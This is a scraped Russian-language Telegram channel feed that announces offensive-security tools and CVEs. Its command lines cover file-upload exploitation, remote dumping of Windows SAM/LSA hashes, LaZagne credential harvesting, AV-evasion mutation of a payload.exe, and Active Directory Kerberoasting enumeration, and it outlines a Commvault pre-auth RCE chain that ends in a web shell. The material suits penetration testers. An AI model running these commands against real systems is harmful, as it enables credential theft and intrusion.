Whitehat Lab
1.93K subscribers
339 photos
390 links
Авторский канал об информационной безопасности 🔐
Свежие CVE, Red Team инструменты, внутренняя инфраструктура и другое

Чат: @whitehat_chat

Все материалы предназначены исключительно в образовательных целях
Download Telegram
📞 Upload_Bypass v3.0.9-dev

Инструмент, предназначенный для тестирования механизмов загрузки файлов (upload forms). Использует различные методы поиска ошибок, чтобы упростить процесс выявления и эксплуатации уязвимостей.

С простенькими формами и уязвимостями справляется, тестировалось на машине HackTheBox - Magic

Работает с request файлом взятым из 😈 Burp, в Repeater ПКМ - copy to file. Заменить содержимое, имя файла и mime type на *content*, *filename*, *mimetype* соответственно.

Установка:

git clone https://github.com/sAjibuu/Upload_Bypass.git

pip install -r requirements.txt


Режим детектирования:

python upload_bypass.py -r test -s 'File uploaded successfully' -E php -D /uploads --burp --detect


Режим эксплуатации:

python upload_bypass.py -r test -s 'File uploaded successfully' -E php -D /uploads --burp --exploit


Anti malware mode:

 python upload_bypass.py -r test -s 'File uploaded successfully' -E php -D /uploads --burp --anti_malware


💻 Home

#web #pentest #upload #python #soft

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
4👌2
Forwarded from Похек
Охотники на баги и где они обитают: итоги опроса о багхантинге
#bugbounty #bughunters #багбаунти #багхантинг

PT сделали исследование и написали спец статью для Хабр о портрете багхантеров, получилось интересно, хоть и с призмой явного перевеса в "свою сторону"))


В мире, где цифровые технологии пронизывают все аспекты жизни, безопасность разработки становится не просто важной, а критически необходимой. Однако с ростом сложности IT-решений и ускорением темпов обновлений обеспечить безупречную защиту данных и пользовательского опыта становится всё труднее. В таких условиях компании всё чаще обращаются к сообществу, запуская программы багхантинга — поиска уязвимостей силами внешних специалистов за вознаграждение.

Мы решили узнать, как российское IT-сообщество воспринимает багхантинг, и провели опрос среди читателей Хабра. Более 300 человек прошли тест до конца, около 1000 ответили на часть вопросов, что позволило нам составить портрет современного багхантера. Спасибо всем участникам! А теперь давайте разберёмся, что же удалось выяснить. В конце каждого раздела дадим галерею с итогами опроса, чтобы вы могли посмотреть на полное распределение процентов по ответам.

P.S. очень классные картинки нагенерили))

🔗Изучить исследдование

🌚 @poxek | 🌚 blog.poxek.cc | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча
Please open Telegram to view this post
VIEW IN TELEGRAM
71
Forwarded from Ralf Hacker Channel (Ralf Hacker)
Часто же бывает такое, что необходимо найти машины, на которых работают определенные пользователи. Скрипт показывает сессии на всех хостах, которые дернет из LDAP.

https://github.com/p0dalirius/FindUnusualSessions

#pentest #redteam #ad #enum
🔥5🫡1
🔄🖼️ go-secdump v0.5.0

Инструмент для удалённого извлечения хешей и копирования чувствительных 🏠 Windows файлов (SAM, LSA) без сохранения на диск

Добавлено:

Go-secdump can now dump the registry secrets without changing any DACLs thanks to the SeBackupPrivilege


Пример:

./go-secdump.exe --host HOST --user Admin --pass Pass123 --local --sam

./go-secdump.exe --host HOST --user Admin --pass Pass123 --local --lsa

./go-secdump.exe --host HOST --user Admin --pass Pass123 --local --dcc2


Relay:

./go-secdump.exe --host 192.168.0.100 -n --relay


Основные опции:

--host <target>
-P, --port <port>
-d, --domain <domain>
-u, --user <username>
-p, --pass <pass>
-n, --no-pass
--hash <NT Hash>
--local
-k, --kerberos
--dc-ip
--target-ip
--aes-key
--dump
--sam
--lsa
--dcc2
--relay
--relay-port <port>


💻 Home
💻 Download

#soft #golang #redteam #gosecdump

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
31
🎩 How I Used AI to Create a Working Exploit for CVE-2025-32433

Исследование о нашумевшей уязвимости в SSH реализации от Erlang/(OTP) которой присвоили оценку по CVSS - 10.0

😉 Research
😹 PoC

#research #cve #poc

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
👍9🔥1
🔄🔺 Dalfox 2.11.0

Мощный инструмент для поиска и обнаружения XSS уязвимостей. Написан на 🖼️ Go

UPD. 2.11

Установка:

go install github.com/hahwul/dalfox/v2@latest


Пример:

dalfox url http://testphp.vulnweb.com/listproducts.php?cat=123&artist=123&asdf=ff -b https://your-callback-url


💻 Home
🔠 Wiki

#soft #dalfox #golang

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
Forwarded from Offensive Xwitter
😈 [ hasherezade @hasherezade ]

Centralized resource for listing and organizing known injection techniques and POCs:

🔗 https://github.com/itaymigdal/awesome-injection

🐥 [ tweet ][ quote ]
👍3
🔄✖️ Astral-PE v1.6.0.0

Протектор для 💻 Windows PE файлов
Изменяет важные структуры - timestamps, headers, section flags, debug info, import/export

⚙️ Использование:

./Astral-PE.exe payload.exe -o payload_clean.exe


😹 Home
😹 Download

#astralpe #mutator

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥2
🔄 📞 The LaZagne Project v2.4.7

Инструмент для восстановления забытых 😄 паролей, написан на Python 💻 На самом деле средство пост эксплуатации, поддерживается большое количество программ: браузеры, IM, почтовые клиенты.

UPD. Автор добавил поддержку Яндекс браузера

📌 Список поддерживаемого ПО

Примеры использования
:

laZagne.exe all
laZagne.exe browsers -firefox
laZagne.exe all -oA -output C:\Users\test\Desktop
laZagne.exe all -quiet -oA
laZagne.exe all -password Password


💻 Home
💻 Download

#lazagne #python #password #recovery #soft

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5😁221
🖼️ minikube v1.35.0

Локальный Kubernetes в Linux, Windows и MacOS

Фичи:

▪️ LoadBalancer
▪️ Multi-cluster
▪️ NodePorts
▪️ Persistent Volumes
▪️ Ingress


Установка в Linux:

curl -LO https://storage.googleapis.com/minikube/releases/latest/minikube_latest_amd64.deb
sudo dpkg -i minikube_latest_amd64.deb


Основные команды:

minikube start
minikube dashboard
kubectl create deployment hello-minikube --image=kicbase/echo-server:1.0
kubectl expose deployment hello-minikube --type=NodePort --port=8080
minikube service hello-minikube
minikube start --kubernetes-version=latest
minikube stop
minikube delete
minikube delete --all


😹 Home
😉 Docs

#kubernetes #minikube #devops

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🤷11
⚙️ CVE-2025-21204 - Windows Update Stack LPE

Повышение привилегий (LPE) в 💻 Windows системах. После установки штатных апдейтов у некоторых пользователей появилась директория C:\inetpub, обычно используется в рамках работы веб-сервера IIS, у меня например появилась. Это если что такой фикс от микрософт 😁 и удалять ее не стоит.

😉 Research
😉 PoC

#windows #lpe #poc

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
2👍1
🎩 🗂 Доклады с конференции Black Hat Asia 2025

⌨️

DriveThru Car Hacking Fast Food, Faster Data Breach
KernJC Automated Vulnerable Environment Generation for Linux Kernel Vulnerabilities
vCenter Lost How the DCERPC Vulnerabilities Changed the Fate of ESXi
etc.


😹 Home
😹 Download

#pentest #blackhat #blackhatasia

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
3👍1
😁9🤔2
Виноваты безопасники ?
Anonymous Poll
23%
Да
28%
Нет
48%
Я безопасник 😅
🤝122
🔄 🏃 adPEAS v0.8.27

Отличный инструмент для поиска и сбора информации в 🏠 Active Directory

Представлен в 2х вариантах, стандарт и лайт

Полная версия имеет встроенный модуль SharpHound для сбора информации в 😉 Bloodhound

UPD. Добавили поддержку модуля для Bloodhound CE

Стандартный запуск:

Import-Module .\adPEAS.ps1
Invoke-adPEAS


Доступные модули:

Domain - поиск базовой информации о контроллерах домена, сайтов, трастов и стандартных парольных политиках

Rights - поиск различных прав, например LAPS, DCSync и т.д.

GPO - базовая информация о групповых политиках

ADCS - информация о центрах сертификации

Creds - ASREPRoast, Kerberoasting, GroupPolicies, Netlogon скрипты, LAPS, gMSA и т.д.

Delegation - поиск делегирования, например ограниченное делегирование, неограниченное делегирование и RBCD (Resource Based Constrained Delegation) для компьютеров и учетных записей

Accounts - информация об аккаунтах

Computer - AD DS, AD CS, Exchange серверы и т.д.

BloodHound - сборщик данных для BH


Варианты запуска:

Invoke-adPEAS -Domain 'contoso.com' -Outputfile 'C:\temp\adPEAS_outputfile' -NoColor

Invoke-adPEAS -Domain 'contoso.com' -Server 'dc1.contoso.com'


Определенная УЗ:

$SecPassword = ConvertTo-SecureString 'Passw0rd1!' -AsPlainText -Force

$Cred = New-Object System.Management.Automation.PSCredential('contoso\johndoe', $SecPassword)

Invoke-adPEAS -Domain 'contoso.com' -Cred $Cred


Модули:

Invoke-adPEAS -Module Domain

Invoke-adPEAS -Module Rights

Invoke-adPEAS -Module GPO

Invoke-adPEAS -Module ADCS

Invoke-adPEAS -Module Creds

Invoke-adPEAS -Module Delegation

Invoke-adPEAS -Module Accounts

Invoke-adPEAS -Module Computer

Invoke-adPEAS -Module Bloodhound -Scope All


💻 Home

#soft #powershell #activedirectory #enumeration

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
4🔥22👍1
😁15👍2🔥1🫡1
💻 Windows sudo v1.0.1

Новый инструмент в 💻 Windows 11 (24H2 и новее), позволяющий выполнять команды с правами администратора

Включение:

Параметры > Система > Для разработчиков > Включить sudo


Поддерживает 3 режима работы:

--new-window - в новом окне

--inline - в текущем окне

--disable-input - в текущем окне с отключенным вводом в целевое приложение


По умолчанию работает в режиме нового окна, изменить значение:

# forceNewWindow, disableInput, normal
sudo config --enable normal

sudo netstat -ab


Есть принципиальные отличия от runas:

sudo работает только с правами администратора и использует UAC для подтверждения
sudo не поддерживает выполнение команд от имени других пользователей
sudo может выполняться в текущем сеансе консоли (в зависимости от режима), тогда как runas всегда запускает новый процесс


Банальная унификация, sudo app.exe гораздо привычнее чем runas /user:Администратор "C:\path\app.exe"

Почему я об этом решил написать ? Все таки, это стандартная утилита с довольно интересным и опасным функционалом и я уверен что, мы слышим о ней далеко не в последний раз 😅

UPD. Ключи реестра:

reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Sudo" /v Enabled
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Sudo" /v Enabled /t REG_DWORD /d 1 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Sudo" /v Enabled /t REG_DWORD /d 0 /f


😉 Sudo for Windows
💻 Github

#windows #sudo

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
😁61
⚙️ CVE-2025-34028 - Commvault Pre-Authenticated RCE

Path traversal уязвимость приводящая к выполнению произвольного кода (RCE) без аутентификации

▪️Отправляется HTTP-запрос на /commandcenter/deloyWebpackage.do, в результате чего Commvault получит ZIP-файл с внешнего сервера
▪️Содержимое архива разгружается во временный каталог
▪️Параметр ServicePack для path traversal в предварительно аутентифицированный каталог на сервере, например ../../Reports/MetricsUpload/shell
▪️SSRF через /commandcenter/deployWebpackage.do
▪️RCE через /reports/MetricsUpload/shell/.tmp/dist-cc/dist-cc/shell.jsp

Рейтинг CVSS - 9.0

Уязвимость устранена в версии 11.38

➡️ Research
➡️ Vendor
💻 PoC

#cve #rce #poc

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
21
🖥️ LLMs.txt generator v2

Генератор .txt файлов для обучения LLM

Можно добавить llmstxt.new перед любым URL, например - https://www.llmstxt.new/https://szybnev.cc

Есть API:

# Start LLMs.txt generation
curl -X POST "https://api.firecrawl.dev/v1/llmstxt" \
-H "Authorization: Bearer your_api_key" \
-H "Content-Type: application/json" \
-d '{
"url": "https://example.com",
"maxUrls": 2,
"showFullText": true
}'

# Check generation status
curl -X GET "https://api.firecrawl.dev/v1/llmstxt/job_id" \
-H "Authorization: Bearer your_api_key"


from firecrawl import FirecrawlApp

# Initialize the client
firecrawl = FirecrawlApp(api_key="your_api_key")

# Generate LLMs.txt with polling
results = firecrawl.generate_llms_text(
url="https://example.com",
max_urls=2,
show_full_text=True
)

# Access generation results
if results.success:
print(f"Status: {results.status}")
print(f"Generated Data: {results.data}")
else:
print(f"Error: {results.error}")


😉 LLMstxt
📔 Docs

#llm

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Offensive Xwitter
😈 [ Toffy @toffyrak ]

I have just released my first tool: GPOHound 🚀

GPOHound is an offensive tool for dumping and analysing GPOs. It leverages BloodHound data and enriches it with insights extracted from the analysis.

Check it out here:
🔗 https://github.com/cogiceo/GPOHound

🐥 [ tweet ]
1